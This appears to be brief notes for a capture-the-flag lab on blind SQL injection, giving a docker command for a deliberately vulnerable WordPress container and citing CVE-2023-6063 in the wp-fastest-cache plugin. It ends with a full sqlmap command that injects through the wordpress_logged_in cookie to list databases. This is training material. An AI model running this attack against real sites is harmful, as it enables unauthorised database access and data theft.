docker run -d -p 9042:80 --restart always --name flag-red61 joshbeck2024/ctf-blind-sql-injection-training-flag-red61
$$ Red61 $$
wp-fastest-cache vulnerable to CVE-2023-6063:
wpscan would be a good choice, but it won’t detect the plugin installed here.wp-fastest-cache is installed here
SQLMap is supremely capable of auto-hacking websites that lack input sanitization, PoC (Proof of Concept) code is really easy to find.
SQLMap doing this?sqlmap --dbms=mysql -u "http://IP_OF_TARGET:9042/wp-login.php" --cookie='wordpress_logged_in=*' --level=2 --dbs
